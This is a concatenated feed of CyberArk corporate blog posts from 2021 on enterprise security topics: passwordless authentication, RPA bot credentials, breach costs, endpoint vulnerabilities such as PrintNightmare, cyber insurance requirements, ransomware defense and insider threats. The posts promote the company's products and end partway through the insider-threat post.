A new month is upon us, which means two things. First, your 30-day password may have just expired, and you’ll need to come up with a new one so you can get back on your company network. Before you change that last digit from “3” to “4” and move on, hear us out. Because second, October happens to be Cybersecurity Awareness Month — a month-long effort to raise awareness about the importance of strong cybersecurity practices — and the perfect time to rethink that password.

As digital citizens, we each have a responsibility to protect our corner of cyber space. And especially as the lines between work and home have long since blurred, how we prove we are who we say we are is an important part of that.

In most cases, we “verify” our identities with a password, whether it’s to check a bank account balance, shop online or access work-related applications and systems. But often, these passwords get used in multiple places (after all, you can’t forget your Netflix password if you use the same one to check your work email). But, of course, this is a big problem. Cyber criminals know these dirty little password secrets and target weak passwords as an easy way to steal information and even get rich quick.

Instead of just resetting that password in front of you, here are seven reasons why it may be time for your company to lose it altogether:

1. Most people are terrible at selecting strong passwords. Each of us has an average of 85 passwords between work and personal accounts, and honestly, who has the time to remember all that!? So when it comes time to reset an expiring password, most people simply replace one digit with another, completely negating the intended purpose of the mandatory reset (NIST advises against regular mandatory password resets for this very reason). And while most security teams go out of their way to recommend tips and tricks for complex and unique passwords, many employees fail to follow this advice. Even when people do follow best practices, risky habits like saving credentials in browsers, resorting to Excel sheets or post-it notes or re-using passwords at work and home are as common as you’d think.

2. Password and credential theft happen all the time. It’s easy for attackers to steal or crack credentials — so they keep doing it, using common methods like phishing and impersonation. There’s a whole body of research on the mathematics of password cracking, and the odds are definitely not in your favor. In fact, the 2021 Verizon Breach Investigations Report found that a whopping 80% of hacking-related breaches can be linked to stolen or brute-forced credentials.

3. Password issues are a productivity suck for you and your company’s IT help desk team. Every time you get locked out of an account or can’t access a work resource, you lose valuable time. You must call your IT help desk team, who likely has to reset the password or help you get the access you need to do your job. Our team made some simple calculations to come up with a dollar amount for the lost time spent resolving password issues: an enterprise of 1,000 employees spends about $495,000 annually. Instead of focusing on important business tasks, employee productivity plummets while IT help desk managers pull longer shifts to address access issues and deal with (understandably) frustrated end-users.

4. Password managers are only a first line of defense. Having dedicated password managers can be a helpful way to protect your personal passwords by eliminating the need to memorize credentials or store them in a browser. But they’re not foolproof, especially if you’re re-using the same passwords for home and work. They also don’t provide adequate coverage in corporate environments, where many different users need many different levels of system access. Password managers can’t manage who gets access to what sensitive resources and for how long. Meanwhile, IT teams have limited visibility into access-related events, creating security gaps and risk exposure.

5. Comfort and confidence in passwordless authentication methods are growing. Getting prompted repeatedly to reauthenticate your password gets old quickly. This “security fatigue” leads many people to look for ways of bypassing or ignoring authentication systems. It’s also why 86% of senior security executives say user experience optimization is “important” or “very important” when it comes to authentication. The good news is people are open to trying out new passwordless methods to protect both their personal accounts and their companies’ sensitive data. Specifically, the 2021 Experian Global Identity & Fraud Report found that consumers have an increasing level of comfort and preference for physical biometric authentication methods (e.g., facial recognition and fingerprints) as well as behavior-based authentication methods (e.g., passively observed signals that require no effort from the user).

6. Technology has come a long way. Innovations like machine learning are helping to minimize common passwords annoyances by eliminating excess login requests. Meanwhile, adaptive Single Sign-On (SSO) tools are helping employers overcome security challenges associated with traditional passwords and automate manual access granting processes that can bog down IT help desk teams. With this approach, they can analyze user and device context to determine whether the access request is “normal.” The system should know, for instance, if the user is attempting to access a database not usually accessed as part of their day-to-day activities or if a device is in a different city than usual. If the context is abnormal, the system adapts controls such as requesting reauthentication or adjusting the level of access. Analytics can help minimize friction by putting up gates only when necessary, based on a risk score.

7. Most people are ready to make a change. According to Ponemon Institute research, a majority of IT security practitioners and business users (55%) would prefer a method of account protection that doesn’t involve passwords. And lots of individuals and employers alike are getting on board: Microsoft data shows that 150 million people are already using passwordless logins each month.

To learn more about how passwordless authentication can help protect your own digital identity while helping your company secure critical assets and boost its bottom line, explore our infographic below. And check back soon for week two of Cybersecurity Awareness Month, when we’ll dig into some simple ways to “fight the phish.”

Retire Your Password Infographic

 

]]>
RPA: How to Securely Start and Scale in the Automation-First Era https://www.cyberark.com/blog/rpa-how-to-securely-start-and-scale-in-the-automation-first-era/ Thu, 30 Sep 2021 13:00:08 +0000 https://www.cyberark.com/?p=123436 RPA: How to Securely Start and Scale in the Automation-First Era

Robotic Process Automation (RPA) is one of the key technologies fueling digital transformation. Ranked by industry experts as one of the fastest-growing enterprise software categories, RPA is helping businesses and their employees achieve the efficiency, accuracy and speed needed to compete and thrive. By approaching RPA automation projects and cybersecurity hand in hand, organizations can deliver enhanced digital experiences safely and quickly to customers. 

The Next Technological Disruption in the Enterprise

Over the past few decades, technology innovations have shaped and reshaped our daily lives — in particular, the way we work. RPA is poised to be the next disruptive technology in a series that has revolutionized business as we know it. Let’s take a brief look these six distinct technology eras:

1. The mainframe era enhanced computational and transactional capabilities for governments, large businesses and research organizations.

2. Personal computers (PC) brought the power of computers to the broader population and smaller businesses.

3. Graphical user interfaces (GUI) made computers more intuitive, enabling less computer-savvy individuals to use computers and extending usage further in business and society.

4. Then along came the internet, connecting this vast network of computer users together in new and exciting ways.

5. Mobile brought the power of the internet to our fingertips.

6. The cloud gave us new ways to store vast troves of data, driving a boom in artificial intelligence (AI) capabilities.

Today, with better process mapping, the advent of computer vision and the fast growth of AI, the automation-first era is here. And while the technology supporting automation isn’t necessarily new, how it’s being combined and used is what defines this new chapter.

By utilizing pragmatic AI to drive process automation and digitization, RPA can automate a wide range of knowledge work carried out in today’s digital environment with great speed and precision — while allowing humans to focus on higher-value (and often more rewarding) work. RPA systems range widely in scale and complexity, from simple website chat bots that can answer standard queries to deployments of thousands of bots that can automate credit card processing and fraud detection jobs.

Rethinking How We Work with RPA

Though digital transformation has been on the corporate agenda for some time, some organizations are struggling to make the most of their digital initiatives. RPA is helping many companies overcome these challenges, not only by automating manual processes and enabling users, but also by helping teams break through conventional thinking. For example, in the financial services industry, RPA bots are helping to do everything from streamlining manual underwriting processes, reducing fraudulent activity through account monitoring and assisting with new customer onboarding. By adopting RPA technology — even if it’s one small-scale project to start — organizations can quickly begin to see how they can apply automation to other areas of the business to their advantage.

When considering how RPA may work best for your organization, first examine the work your team is doing to determine which tasks require human involvement — and which repetitive, manual tasks could be offloaded to robots, such as data entry, transaction processing, response triggering and communicating with other digital systems. It’s important to remember that RPA technologies are meant to enhance, not replace, the human workforce. By shifting time and energy away from such low-value, high-volume tasks, employees can focus on ideas, innovation and the best parts of the job that brought them to your organization in the first place.

There are two main types of RPA bots: attended bots that work under human supervision, helping workers do their jobs, and unattended bots that can run without human involvement.

Your organization’s evaluation of RPA needs should involve both a top-down approach (to identify and prioritize key areas for automation to maximize ROI) and a bottom-up approach (to empower workers with automation based on their individual needs).

Protecting RPA Initiatives with Identity Security  

As with all digital transformation projects, security must be a key consideration from the start of an RPA initiative.

RPA bots and automation processes often require high levels of privilege to do their jobs, from interacting directly with business applications to mimicking human behavior and mirroring human identity and access permissions across multiple systems. This provides attackers with yet another potential way to steal data and cause chaos — particularly the estimated one-third of all RPA deployments running unattended today. For example, if threat actors can get their hands on unsecured RPA admin and bot credentials, they could gain access to critical business systems and data.

By enforcing consistent, traceable Identity Security policies such as automatically rotating privileged credentials, establishing secure connections and placing time limits on access permissions — along with driving automation security awareness across the enterprise —organizations can mitigate the risk of credential-based attacks.

Moving Secure RPA Deployments Forward

As their titles suggest, automation engineers are focused on streamlining or eliminating as many manual processes as possible — and security is no exception. Perhaps the greatest benefit of an identity-centric approach to RPA security is that critical security tasks, such as credential management, can be automated to remove former roadblocks that could slow things down, achieve new levels of operational efficiency and safely scale RPA initiatives faster.

CyberArk’s integration with UiPath enables organizations to do just that: improve operational efficiency by automating security function with out-of-the-box integrations.

 

Learn firsthand how CyberArk Secrets Manager Credential Providers can help your organization increase operational efficiency and improve the security of your UiPath RPA deployments. In this on-demand session from UiPath’s Forward IV conference, Brandon Traffanstedt, CyberArk Global Director of Solutions Engineering, joins UiPath’s SVP of Product Nic Surpatanu and Global Security and Compliance lead Kevin Mooney to discuss “End-to-End Management, Governance and Security for Your Entire Automation Program.” This session explores key considerations for deploying automations on-premises, in private or public clouds and in virtual machines, along with best practices for centrally managing, governing and securing your entire automation ecosystem.

 

]]>
Data Breach Costs and Cloud Security Implications: 2021 https://www.cyberark.com/blog/data-breach-costs-and-cloud-security-implications-2021/ Fri, 24 Sep 2021 13:00:01 +0000 https://www.cyberark.com/?p=123123 Data Breach Costs and Cloud Security Implications: 2021

A hybrid cloud makes a lot of sense for most modern businesses. By stacking all your IT “building blocks” — services and infrastructure hosted on-premises or in your private and public cloud environments — together into one architecture, you get the best of both worlds.

The benefits of a unified, hybrid cloud are many: flexibility to quickly scale technology projects up and down, agility to adopt new solutions quickly and cost-efficiency through resource optimization, to name a few. In fact, companies derive up to 2.5 times the value from hybrid cloud than from a single-cloud, single-vendor model, according to recent IBM research. But if your approach to cloud security isn’t equally cohesive, risks can escalate quickly across these huge, interconnected environments.

Since the start of the pandemic and rise in remote work, 60% of organizations have moved further into cloud-based activities. During this period of drastic operational shifts, the average cost of a data breach reached $4.24 million per incident — the highest recorded cost to date. We dug into IBM’s latest Cost of a Data Breach report to explore the security implications of this sustained push to the cloud. Here are five takeaways for organizations as they adopt hybrid cloud models to enable their business and deliver the digital experiences customers have come to expect:

1. Cloud breaches begin with compromised credentials

Unsurprisingly, the study found stolen credentials was the most common root case of breaches. Breaches stemming from compromised credentials took the longest to detect: an average of 250 days.

With time on the attacker’s side — coupled with the fact that 82% of surveyed individuals admit to reusing credentials and passwords across accounts — just think how easy it is for an attacker to unlock a “door” on-premises or in the cloud, then move laterally and escalate privileges across a hybrid environment to reach their goals. For instance, by compromising one over-permissioned cloud identity through credential theft, a bad actor could compromise critical infrastructure or escalate their privileges to steal cloud-hosted data or disrupt high-value applications.

2. Attackers covet sensitive customer PII data

There are many ways of measuring cost-of-breach damages. Some forms of data loss are costlier to remediate when compromised, so defenders must be cognizant of which sensitive assets to prioritize to minimize damage. For instance, the loss of customer personal identifiable information (PII) was the most expensive compared to other types of data, at $180 per lost or stolen record versus an average of $161 for overall per record.

3. On-premises-to-cloud and cloud-to-cloud migrations require careful planning

The study found that companies experiencing a breach during a cloud migration project faced an average of 18.8% higher costs. Whether you’re migrating data, applications or systems from an on-premises datacenter to the cloud, or you’re shifting workloads from one public cloud provider to another, don’t rush the process or cut security corners. From investing in monitoring to implementing least privilege access, careful preparation for a safe and secure transition is a must.

4. Automate everywhere to scale cloud defenses and save on costs

Attackers are using automation to pinpoint identity-related vulnerabilities in cloud environments, especially overly permissive resource misconfigurations and over-permissioned identities — to get more done without much effort. Security teams that are scaling defenses to fight automation with automation are finding success: organizations that have adopted artificial intelligence (AI), security analytics and encryption have saved between $1.25 million and $1.49 million compared to those who did not have significant usage of these tools. The study found about 65% of companies are partially or fully deploying automation within their security environments, compared to 52% two years ago.

5. Minimize data breach impact by consistently enforcing least privilege

The good news is more companies are getting on board with modern Identity Security tactics, such as AI-powered threat detection, behavioral analytics and the adoption of Zero Trust models. Companies with a mature Zero Trust strategy had an average data breach cost of $3.28 million $1.76 million lower than those without one. This “trust nothing; verify everything” philosophy is also helping companies address one of the top-cited cloud security challenges today: the countless identities with misconfigured or unused cloud Identity and Access Management (IAM) permissions hidden throughout hybrid cloud environments.

As organizations rapidly scale cloud deployments and adopt advanced services to digitally transform their business, the creation of human, application and machine identities is accelerating. Access permissions for these identities are often granted based on group or role, resulting in too many identities having unused or unnecessary permissions. By using AI-powered monitoring and detection capabilities, companies can consistently enforce least privilege principles across their hybrid cloud environments by removing excessive permissions,  significantly reducing risk and improving overall visibility and security.

The Zero Trust Bottom Line

Assume your enterprise has been breached. Period. The IBM report points out that it may take months to discover. At CyberArk, we believe a comprehensive least privilege, Zero Trust approach can help close that window and minimize an attack’s “blast radius” by unmasking attackers quickly and stopping them from accessing hybrid cloud resources. Applying modern security tactics like AI and automation can also cut time-to-detection significantly and reduce breach costs.

One final set of numbers: The IBM study broke down the average breach cost of $4.24 million into four categories: lost business ($1.59 million), detection and escalation costs ($1.24 million), post-breach response ($1.14 million) and notification ($0.27 million).

With average breach costs spiking 10 to 20% higher than costs suffered by companies with Zero Trust strategies, can organizations really afford the price of inaction? Don’t wait to find out. By positioning identity at the heart of your security strategy, your organization can move forward with confidence, knowing your most critical assets are secure.

 

 

 

]]>
Find CyberArk at these DevSecOps Fall 2021 Events https://www.cyberark.com/blog/find-cyberark-at-these-devsecops-fall-2021-events/ Wed, 22 Sep 2021 14:34:54 +0000 https://www.cyberark.com/?p=123100 Find CyberArk at these DevSecOps Fall 2021 Events

Applications, as well as the tools and automated processes throughout the DevOps pipeline, are increasing targets for sophisticated digital supply chain attackers. But with the right tools and strategy in place, security teams can partner with developers to establish agile, secure and productive supply chains and dev environments.

Over the next several weeks, the CyberArk team will be meeting with DevOps and security leaders around the globe — both virtually and in person — to explore DevSecOps approaches that mitigate risk and uncertainty without slowing velocity because no team should ever have to sacrifice security to ship features faster. Here’s where you can find us this fall:

CloudBees’ DevOpsWorld: September 28-30, 2021

We’re proud to sponsor DevOpsWorld 2021, hosted by CloudBees, where thousands of practitioners, developers and community members will come together virtually to shape the future of software delivery. Register for free and don’t miss these CyberArk sessions:

  • Securing Jenkins Pipeline with CyberArk Conjur Secrets Manager. A secure DevOps pipeline is possible — in fact, it’s easier than you might think. On Sept. 28 at 2:30 p.m. EDT, CyberArk DevOps Security Advisor Jody Hunt will lead this 90-minute workshop, exploring practical guidance on making Jenkins and CloudBees pipelines more secure, removing secrets from code and securing DevOps and automation tools.
  • Securing Jenkins Pipelines in Mission-Critical R&D Environments. Secure Jenkins pipelines are a must for mission-critical R&D pipelines. In this on-demand session, CyberArk Director of R&D Eran Koifman will outline ways to secure Jenkins pipelines to prevent code injection, how to establish policies to segment code bases while effectively balancing security and productivity and best practices based on real-world case studies.
  • 5 Ways to Secure Jenkins — You Won’t Believe #3! CyberArk DevOps Security Engineer Joe Garcia will outline five ways to bolster Jenkins security — for free. He’ll also share tips on working with security, scoped at the global, folder or job level, and how to introduce stronger security to freestyle jobs. You can catch his talk on Sept. 29 at 4:00 p.m. EDT and again on Sept. 30 at 7:00 a.m. EDT.

Red Hat AnsibleFest: September 29-30, 2021

Organizations around the world use Ansible and CyberArk’s integrated solutions to streamline the rotation and management of secrets and privileged credentials and automate the prevention and remediation of high-risk activities. Register and learn how during the AnsibleFest 2021 virtual experience.

On Sept. 30 at 12:00 p.m. EDT, Joe Garcia and co-presenter Roland Wolters, principle technical marketing manager at Isovalent, will present “Red Hat + CyberArk: A Reference Architecture for Securing Ansible Automation & CI/CD Pipelines.” They’ll explore the Red Hat Ansible Automation Platform and CyberArk reference architecture, elaborate on best practices used by organizations for layering security into their automation platforms and share proven tips for avoiding potential pitfalls along the way.

KubeCon and CloudNativeCon: October 11-15, 2021

Kubernetes and other cloud native technologies enable higher-velocity software development at a lower cost than traditional infrastructure. Cloud native — orchestrating containers as part of a microservices architecture — is a departure from traditional application design. Whether you’re heading to Los Angeles or tuning in from your home office, there’s much to discover about securing secrets in this new terrain.

During the event, check out a demo to see how Conjur Secrets Manager Enterprise and Open Source editions make it easier for developers to secure apps running in Kubernetes environments.

Connect with CyberArk at one of these upcoming DevSecOps events, or contact us directly to discover secure, simplified ways to unleash DevOps agility and scalability. By taking a proactive approach to security, leveraging automation and programmability and encouraging cooperation among teams, organizations can accelerate the pace of innovation while meeting compliance with corporate security mandates.

]]>
Don’t Let Cybersecurity Cracks Become Major Breaches https://www.cyberark.com/blog/dont-let-cybersecurity-cracks-become-major-breaches/ Fri, 17 Sep 2021 20:41:54 +0000 https://www.cyberark.com/?p=123020 Don’t Let Cybersecurity Cracks Become Major Breaches

Many major cybersecurity breaches can be traced back to the tiniest flaw. But as zero-day exploitations continue to make headlines and new vulnerabilities enter the National Vulnerability Database (NVD) almost daily, it’s often hard for security teams to seal the cracks and fix the bugs fast enough (not to mention address hidden issues they don’t even know about).

It’s a lot like owning an old house. Something always seems to be breaking or leaking, and even the most industrious do-it-yourselfer can quickly become overwhelmed by their growing to-do lists. With limited time, resources or know-how, homeowners tend to focus on the “big stuff” — replacing the washing machine that suddenly dies or calling emergency pest services after a mouse skitters across the kitchen floor.

But putting off or ignoring tiny issues, like the ones in this house, can lead to major headaches down the road … and sometimes, much sooner than you’d expect.

Cyber Vulnerabilities Old House

Window Cracks

You think your kids were just playing baseball and accidentally broke a window. Little do you know there’s an invisible structural shift taking place underground that’s creating undue pressure on all your windows and threatening every glass entry point into the house.

Malicious code execution can be a lot like that shift in pressure change. For example, a minor Patch Tuesday update quickly morphed into a critical code execution and privilege escalation vulnerability within the Windows Print Spooler service. Today, there are several known variants of this security issue, collectively known as “PrintNightmare.” Once these vulnerabilities are exploited, the “glass” can break when SYSTEM is obtained.

Recent reports indicate ransomware attackers are riding the PrintNightmare wave, taking advantage of unpatched networks to compromise and decrypt files and demand ransom payments.

Flickering Lights 

Your lights just flickered suddenly. But you shrug it off, figuring you just haven’t changed the bulbs in a while. What’s actually happening is far more serious: Your home’s wiring is inadequate, and you’ll soon be facing a hefty bill from your electrician.

These flickering lights are akin to HiveNightmare, also known as SeriousSAM, a local privilege elevation vulnerability that allows an attacker to access critical secrets from the shadow copy of the Windows registry. While you may just see “flickering lights,” from time to time, small stealthy changes are happening in your fuse box — which can eventually lead to an overload or meltdown.

An attacker who successfully exploited this zero-day vulnerability could “run arbitrary code with SYSTEM privileges” and then “install programs; view, change or delete data; or create new accounts with full user rights,” according to Microsoft. The company warns that it’s not enough to simply patch systems; instead, all file shadow copies must be deleted as well.

Slow Drainage

What you think is just a pesky shower clog is really a major issue across your entire main sewer line. Yet you pour in some drain cleaner and get back to your day.

It’s like the unknown vulnerability within Kaseya’s IT management software that was first exploited to ignite the far-reaching REvil ransomware supply chain attacks. Attackers reportedly compromised Kaseya’s Virtual System Administrator (VSA) solution, which is used to remotely monitor and manage endpoints and servers. With control over SaaS and on-premises Kaseya VSA servers — along with other MSP-managed on-premises servers — the threat actors pushed a phony software update containing the ransomware to ultimately infect at least 1,500 MSP businesses and their downstream customers.

Water Damage

You notice something that looks like water damage in your basement, but the area is completely dry. You can’t seem to find the source of the leak. What you don’t realize is that a termite colony has been thriving under your floorboards, behind your walls and in your basement … for several years.

Cloud Hopper, a multi-year cyber invasion that targeted the world’s largest technology and cloud service providers and their customers, began by compromising one single endpoint. For one victim organization, the attack cycle continued for at least five years as attackers leveraged automation and privileges of trusted services to distribute malware and worm deeper into systems — without raising red flags.

Protect Your House with Defense-In-Depth Starting at the Endpoint 

Maintaining a safe and secure property is an ongoing labor of love and as any seasoned homeowner understands, it requires a whole toolbox and reliable network of experts to help with the heavy lifting.

The same goes for cybersecurity: Protecting your organization is an ongoing effort, not a box to check off, and the most effective approach involves multiple tools working together. Comprehensive endpoint security strategies often comprise endpoint detection and response (EDR), next-generation anti-virus (NGAV), Privileged Access Management, and application and operating system patching tools and best practices.

Cyber attackers look for tiny cracks — often on the endpoint — to penetrate your IT estate and gain an initial foothold. From there, they cleverly perform reconnaissance and avoid detection to either steal data, take down critical applications and infrastructure — or pursue whatever their end game is. What can start small as a somewhat insignificant security event can result in a major breach that brings the business to its knees. These endpoint-originated attacks can disrupt your business, damage your company’s reputation and lead to steep regulatory fines. Yet just like homeowners who put off seemingly “minor” issues, many organizations underestimate their endpoint security risks, leaving the door wide open for attackers.  By maximizing your endpoint security posture with a layered security approach, your organization can reduce risk and uncertainty and protect your digital “house.

Interested in learning more? Defense-in-depth solutions such as CyberArk Endpoint Privilege Manager enforce privilege escalation and credential theft controls that help prevent attackers from gaining administrative access in your environment and getting their hands on your most valuable assets. Meanwhile, end-users can get temporary, on-demand access to the privileged resources they need without overburdening the IT help desk. This can also help protect against zero-day exploits and ransomware by restricting or blocking suspicious applications. And if an endpoint device hasn’t been adequately patched against a vulnerability like PrintNightmare, policies are dynamically implemented to stop the vulnerable software from executing.  Learn more about CyberArk Endpoint Privilege Manager or request a free trial today.

]]>
Cyber Insurance: How to Meet Requirements, Save Money and Reduce Risk https://www.cyberark.com/blog/cyber-insurance-how-to-meet-requirements-save-money-and-reduce-risk/ Tue, 14 Sep 2021 20:35:54 +0000 https://www.cyberark.com/?p=122984 Cyber Insurance: How to Meet Requirements, Save Money and Reduce Risk

As the average cost of a data breach reaches a record high of $4.24 million, one successful zero-day exploit or ransomware attack has the potential to take down a business completely. Having cyber insurance, or cyber liability insurance coverage (CLIC), in place is an integral piece of a proactive risk mitigation strategy. And while it can’t protect your organization’s most valuable data and systems, a cyber insurance policy can help minimize post-incident business disruption, speed recovery efforts and curb related costs to your organization — and in some cases, impacted partners and customers downstream.

Cyber Insurance: A Hefty Price Tag for Peace of Mind and a “Sure Thing” No Longer

During the unprecedented year that was 2020, the number of enterprises electing to adopt new cyber insurance policies nearly doubled from 26% to 47%, according to the U.S. Government Accountability Office (GAO). It only takes a handful of high-profile attacks to wipe out the billions generated via premiums by cyber insurance companies, as payouts for the attacks have been so extortionately high that providers have undergone massive direct-loss ratios for standalone policies. As pandemic-driven cyber risks persist, demand continues to grow.

In response to these market changes, insurance premiums have risen sharply across the board. Underwriting standards, policy terms and payout conditions are also getting much stricter — in some cases, limits are being slashed in half. Last month, Reuters reported that AIG has increased its pricing by nearly 40% globally, while implementing tighter terms to address increasing cyber loss trends.

Feeling the strain, some insurance brokers are refusing coverage altogether. After filling out a policy application or annual renewal questionnaire — once relatively easy steps to take — some organizations are being turned away flat out.  The ones that are not turned away are seeing much more stringent pre-audit requirements, demanding for a stronger security posture both in terms of controls, as well as incident response plans. The inability to meet these new requirements can result in increased rates of up to 300%. Unless these organizations make immediate changes to step up their security controls — often within a 60-day window — they risk losing their existing coverage completely. The urgent need to roll out controls and demonstrate risk reduction quickly is driving many organizations to explore SaaS-delivered security solutions that provide rapid time-to-value.

Be Prepared: What to Expect When Applying for Cyber Insurance

Since the cyber insurance landscape is changing so rapidly, it’s important to understand the latest requirements and enter the process with eyes wide open. Here are some things you can expect, along with steps you can take to maximize coverage and minimize costs.

Whether your organization is considering cyber insurance for the first time or is up for a policy renewal, you’ll have to fill out a questionnaire about your existing cybersecurity tools, controls and processes. Your organization’s ultimate evaluation “score” helps the insurance broker quantify your level of risk and overall security posture. It’s a lot like buying health insurance: the “healthier” you are, the lower your rate is likely to be.

While each insurance broker’s evaluation process differs, there are certain security controls that are almost always required for an organization to obtain, and keep, cyber insurance coverage.

Such mandates often involve Identity and Access Management (IAM) controls and best practices in alignment with industry standards put forth by the Center for Internet Security, CISA and others.

For example, since many of today’s most damaging attacks stem from compromised privileged credentials, most carriers require Privileged Access Management (PAM) controls to protect privileged accounts — those that unlock access to high-value systems and data. Least privilege controls, for instance, may be required to strengthen ransomware defenses, protect sensitive data in cloud environments and address compliance concerns.

Insurers also want assurance that multi-factor authentication (MFA) is being utilized to bolster security and authenticate administrative access to those privileged accounts. Recent attacks have shown that if your authentication systems are protected by passwords alone, it’s not a question of if you’ll be compromised, but when. Failure to implement MFA elevates your risk level, and in turn, your premium rates. And in the age of hybrid work, insurers’ MFA requirements are extending to remote network access and remote email access as well. They are also increasing security requirements around privileged access for third-party vendors to minimize supply chain risk.

Leading Insurers Recognize CyberArk for Ability to Effectively Reduce Cybersecurity Risk

The insurance industry will continuously improve its approach to addressing the systemic nature of cyber risk. As part of this, insurers are coming together help their customers navigate the cybersecurity marketplace and implement more effective tools and processes.

The Cyber CatalystSM program, created by Marsh, a global leader in insurance broking and risk management, this year recognized CyberArk for its ability to effectively reduce cybersecurity risk. CyberArk was the only Privileged Access Management vendor to receive this distinction — further validating the importance of PAM to an overall cybersecurity strategy, along with our security-first approach to delivering integrated authentication, authorization, access and audit along every step of the Identity Security lifecycle.

The program’s rigorous evaluation process involved participating insurers assessing the ability of cybersecurity solutions to address prominent risks including ransomware, supply chain and vendor management, cloud migration and management, social engineering, and privacy regulation and data management. In their evaluation of the CyberArk Identity Security Platform, the insurers had this to say:

  • “One of the best identity access management solutions and timely, given emerging regulatory concerns regarding visibility of data. Helps meet the requirement for improved control and oversight of access to data based on user role.”
  • “A comprehensive solution for privilege access management and simplifies the local admin access problem. Targets the key ways attacks happen and looks closely at unauthorized actions, rather than standard indicators of compromise.”

Privileged Access Management remains at the heart of a successful cybersecurity strategy, offering organizations the peace of mind that their most critical assets are protected.

Our industry-leading SaaS-delivered solutions can help your organization jump-start privilege-related risk reduction and realize rapid time-to-value. And if you’re currently focused on a “sprint” to close security gaps within the 60 period to get — or keep — a cyber insurance policy, the CyberArk Blueprint outlines practical steps for implementing controls that help address the most urgent requirements in the shortest time possible. Adhering to incident response best practices recommended by leading authorities, this framework is designed to defend against three common moves nearly every attacker makes to steal data and disrupt systems and secure access to the most frequently targeted privileged accounts and identities.

Have specific questions or concerns about meeting cyber insurance requirements? Get in touch to learn how our team can help you prepare, potentially save on premiums, reduce risk and securely move your business forward.

Tune in! To dig deeper into the ins and outs of cybersecurity insurance, how recent cyber activity has impacted the market and more, listen to this episode of the CyberTalk with CyberArk podcast, featuring special guest Mark Camillo, CEO at CyberAcuView.

 

 

 

]]>
Ransomware Defense Best Practices https://www.cyberark.com/blog/4-ransomware-defense-best-practices/ Wed, 08 Sep 2021 21:06:43 +0000 https://www.cyberark.com/?p=122862 4 Ransomware Protection Steps

Ransomware has never been more prevalent — or profitable — than it is right now. What started as the exclusive domain of highly skilled and opportunistic bad actors has evolved into an underground industry in which virtually anyone can get their hands on pre-built tool kits and plans to launch ransomware attacks at an alarming pace.

Many businesses are searching for a “silver bullet” to prevent attacks and stay out of the headlines. But protecting against ransomware — and the repeat or double-extortion attacks that increasingly follow — is more of a mentality and posture than it is a particular set of tools.

Ransomware Attacks Have Increased By 151%

Much like an American football game where the defense must plan for everything an offense throws at them, IT and security teams must anticipate the many elements, angles and paths a ransomware attack can include.

Whether your organization has found itself in the unenviable position of charting a road to recovery, or if proactive protection is your aim, it’s important to keep these four things in mind when creating a defensive playbook. Following these steps can also help streamline processes for recovery and regaining trust in compromised environments:

1. Reframe your assumptions about cyber risk. Acknowledge that breaches will happen, given enough time. With this mindset, shifting to a defensive posture that focuses attention and resources squarely on proactively protecting mission-critical systems and educating users on cybersecurity fundamentals becomes easier to do. It will also streamline processes for recovery and regaining trust in compromised environments.

As in sports, it’s critical for security to stay agile, so you can quickly pivot and make changes — with the understanding that even with the best preventative controls in place, something could still slip through.

Ransomware Facts

2. Revoke admin rights across your environment. Breaching an endpoint and stealing privileged credentials on it — those that grant or have administrator rights — supercharges attackers’ ability to encrypt high-value data and hold it for ransom. Your playbook should emphasize protection of highly privileged systems by revoking admin rights from human users and applications and consistently enforcing least privilege — the lowest possible clearance level that allows the user to perform their role.

Mapping out the potential lateral movement routes an attacker might take — and ranking them in order of likelihood and severity — will drive a more systematic defensive approach. This can also help you ward off credential theft attempts, block ransomware with increased certainty and detect insider threats faster to minimize damage.

3. Run regular drills to test cybersecurity defenses. Of course, it’s impossible to anticipate every potential “play,” especially since ransomware attackers change tactics frequently. Instead, continuously test and reassess your security processes to determine whether certain connections, access rights and recovery processes align with your organizational goals. For example, validate whether connections to privileged access points follow the right protocols and limitations to address potential vulnerabilities or overlooked points of failure.

Working with an outside Red Team can help test existing security controls against common tactics, techniques and procedures (TTPs) to help dissuade future attacks. If you do suffer from a security event like a ransomware attack, incident response services are integral in identifying the scale of the attack, determining if any indicators of compromise (IOCs) remain in the environment and helping you minimize loss.

4. Ruin attackers’ plans. Just because you “assume breach” doesn’t mean you’re backing down. There are many strategies you can employ to make attackers wish they had gone elsewhere. For instance, you can reduce risk exposure by starting all network users and applications with standard accounts that have no admin rights and elevate applications requiring admin rights on an as-needed basis.

This will help shut down common attack vectors such as phishing campaigns, remote desktop protocols (RDPs) and unauthorized local downloads.

This step can be supplemented by adding automated secrets and credentials management on critical targets to stop attackers from using stolen tokens or keys to access high-value data and monitoring network activity for suspicious behaviors.

Attacks on the endpoint are virtually constant, and it’s clear that some will succeed. Yet, it’s what happens next that determines whether the attack truly alters the score or simply winds up a fumble.

A winning ransomware defense playbook will consider — and can intercept — ransomware attempts at every point along the attack chain by embracing the right mindset, a defense-in-depth approach that layers preventative controls and detective mechanisms and the in-depth expertise needed to keep out of harm’s way and stay in the game.

 

 

]]>
The Cybersecurity Insider Threat “Among Us” https://www.cyberark.com/blog/the-cybersecurity-insider-threat-among-us/ Thu, 02 Sep 2021 17:50:02 +0000 https://www.cyberark.com/?p=122745 The Cybersecurity Insider Threat “Among Us”

Although created a few years before the world went into lockdown, something about the simple app-based game Among Us* truly tapped into the pandemic zeitgeist like nothing else. On the one hand, it was a community-based game that worked perfectly in our new Zoom-based reality — while on the other, it tapped into the mounting dread that we were becoming more disconnected from other people. We were seeing images that looked and sounded like our friends, coworkers and classmates, but how could we know for sure? Were they the people connecting to corporate resources and collaboration applications or others who they said they were? And were they there to do what they said they were there to do? The whole thing was, to borrow the game’s own slang, “kinda sus.”

For those who don’t know, Among Us is like the old board game Clue remixed with a paranoid 1970s sci-fi like Alien and adapted for the digital age. You play a crew member on a space vessel and dress in a spacesuit that’s identical to everyone else’s except for its unique color. You all go about the tasks of maintaining the vessel, but one or more of the crew members are imposters who are stealthily taking out their colleagues. Players must look for and debate clues and suspicious behavior to determine the guilty party. If the true imposter is ejected, everyone wins. If not, they all go back to square one.

Those in the cybersecurity space may not find Among Us to be exactly escapist, considering they play a real-life, high-stakes version of this game every single day. It’s one thing to deny access to a hostile party trying to pose as an authorized user, but it’s quite another to pinpoint a malicious agent who has every right to be in your system.

Insider Threats by the Numbers

The Ponemon Institute’s 2020 Cost of Insider Threats report found the average global cost of insider threats rose by 31% in two years to $11.45 million, while the number of total incidents nearly doubled (rose 47%) in the same time period.

